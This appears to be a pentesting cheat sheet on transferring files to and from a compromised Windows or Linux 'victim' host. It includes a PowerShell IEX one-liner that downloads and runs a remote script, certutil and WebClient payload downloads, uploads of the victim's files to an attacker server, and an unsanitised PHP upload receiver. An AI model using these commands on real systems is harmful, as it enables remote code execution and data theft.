File Transfers

TFTP

Trivial FTP is one of the simplest and easiest ways to transfer files between 2 systems. Windows 7 and above have multiple modes to transfer files such as ftp, powershell, etc, however the problem arises when the sytem is older than Windows 7.

Tftp is present by default in the older operation systems such as Windows XP and it is a great tool for transferring files using a non-interactive method.

Once you have atftpd service install on you linux system, you can use the following commands to transfer files,

sudo atftpd --daemon --port 69 /tftp

The above command gets the ftp server running on your local system. The following command can be used to transfer files into or out of the victim's system,

tftp -i 192.168.1.1 put evil.file

Powershell

Powershell on Windows can be used for transferring files between systems. There are 2 popular methods - Invoke-WebRequest and WebClient. Both the methods use HTTP methods to download or upload files to a server.

You have to have a webserver running in order to download or upload files from it. An apache server with php will be ideal to transfer files. As a makeshift you can also use python to start a webserver to download files. The following command can be used to start a webserver in python,

sudo python3 -m http.server 80

To download a file to a Windows machine using WebClient,

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.php', 'new-exploit.php')

In continuation to the previous command, the same can be used to download a file and execute it without saving it in the victim's system using the following command,

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/hello.ps1')

To upload a file to a Windows machine using WebClient,

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.1/upload.php', 'evil.php')

To download a file to a Windows maching using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/evil.php -OutFile evil.php)

To upload a file to a Windows machine using Invoke-WebRequest,

powershell.exe (Invoke-WebRequest http://192.168.1.1/upload.php -Method Put -Infile C:\Users\Administrator\Desktop\evil.txt -UseBasicParsing)

In the last command the method "Put" is used instead of "Post" in order to avoid elaborate preparation of the HTTP request from the client's end. Instead "Put" is used and respective php scripting has to be deployed at the server end to receive the file.

The following is a sample of PHP code that can be used to receive the file when uploaded from a system,

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) 
?>

SCP

SCP is a network protocol to transfer files securely between linux systems. By default it uses SSH Port - 22 for connecting to the remote server. You will need the username and password of the remote server to which the file needs to be transferred. The following command is a sample for file transfer,

scp file.txt remote_username@192.168.1.1:/Directory/Path

Certutils

Certutils is a Windows tool that can be used for downloading files to the local system.

certutil.exe -urlcache -f http://192.168.1.1/test.exe test.exe

Winrm

When connected to system using winrm, the tool can be used for both uploading and downloading files.

upload <Filename-fullpath> <Upload path full>
download <Filename-fullpath> <Download Path full>